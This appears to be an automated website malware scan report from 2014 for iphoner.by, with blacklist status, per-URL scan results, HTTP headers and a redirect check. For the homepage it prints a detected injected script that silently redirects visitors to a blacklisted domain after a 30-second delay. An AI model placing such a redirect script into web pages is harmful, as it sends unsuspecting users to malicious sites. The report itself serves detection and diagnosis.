Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=iphoner.by
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://iphoner.by/ | 200 OK Content-Length: 110627 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: tds-on.com window.setTimeout("document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz'", 30000); Decoded script: document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz' document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz' /*** called setTimeout with document.location.href='http://tds-on.com/glam/?xid=NwtXZpcz', 30000 */ | ||
http://iphoner.by/engine/classes/min/index.php?charset=windows-1251&g=general&2 | 200 OK Content-Length: 151191 Content-Type: application/x-javascript | clean |
http://iphoner.by/engine/classes/min/index.php?charset=windows-1251&f=engine/classes/highslide/highslide.js&2 | 200 OK Content-Length: 31982 Content-Type: application/x-javascript | clean |
http://iphoner.by/templates/turnion/js/scripts.js | 200 OK Content-Length: 4574 Content-Type: application/javascript | clean |
http://bitly.com/Uc2Jra | HTTP/1.1 302 Found Cache-Control: private; max-age=90 Connection: close Date: Fri, 26 Sep 2014 13:47:43 GMT Location: http://bit.ly/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=Uc2Jra Server: nginx Content-Length: 185 Content-Type: text/html; charset=utf-8 Mime-Version: 1.0 Set-Cookie: _bit=54256e7f-0033c-033a4-401cf10a;domain=.bitly.com;expires=Wed Mar 25 13:47:43 2015;path=/; HttpOnly | clean |
http://bit.ly/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=uc2jra | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, no-store, max-age=0, must-revalidate Connection: close Date: Fri, 26 Sep 2014 13:47:44 GMT Pragma: no-cache Location: https://bitly.com/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=uc2jra Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 | clean |
https://bitly.com/a/warning?url=http%3a%2f%2fya%2dzdorov%2enet%2fnews%2fcode%2ejs&hash=uc2jra | 200 OK Content-Length: 7487 Content-Type: text/html | clean |
http://bitly.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Sep 2014 13:47:45 GMT Location: https://bitly.com/test404page.js Server: nginx Content-Length: 0 Content-Type: text/html; charset=UTF-8 | clean |
https://bitly.com/test404page.js | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com/ | 200 OK Content-Length: 82868 Content-Type: text/html | clean |
https://bitly.com/pages/wp-includes/js/jquery/jquery.js | 200 OK Content-Length: 95807 Content-Type: application/x-javascript | clean |
https://bitly.com/pages/wp-includes/js/jquery/jquery-migrate.min.js | 200 OK Content-Length: 7200 Content-Type: application/x-javascript | clean |
https://bitly.com/pages/wp-content/plugins/bitly/js/bitly-client.js | 200 OK Content-Length: 1164 Content-Type: application/x-javascript | clean |
https://bitly.com/pages/wp-content/themes/bitly/library/js/libs/modernizr/modernizr.custom.min.js | 200 OK Content-Length: 15126 Content-Type: application/x-javascript | clean |
https://bitly.com//use.typekit.net/mys2uzu.js/ | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com//platform.linkedin.com/in.js/ | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com//ws.sharethis.com/button/buttons.js/ | 404 Not Found Content-Length: 9245 Content-Type: text/html | clean |
https://bitly.com/pages/wp-content/plugins/wp-retina-2x/js/retina.js | 200 OK Content-Length: 5682 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: iphoner.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 13:43:56 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 25 Sep 2014 20:43:57 -0700 GMT
Set-Cookie: PHPSESSID=dae6g4kfsp40kpgqspppq04ou2; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: iphoner.by
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 13:43:56 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Thu, 25 Sep 2014 20:43:57 -0700 GMT
Set-Cookie: PHPSESSID=dae6g4kfsp40kpgqspppq04ou2; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 26-Sep-2013 13:43:55 GMT; path=/; domain=.iphoner.by; httponly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: iphoner.by
Referer: http://www.google.com/search?q=iphoner.by
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: iphoner.by
Referer: http://www.google.com/search?q=iphoner.by
Result:
The result is similar to the first query. There are no suspicious redirects found.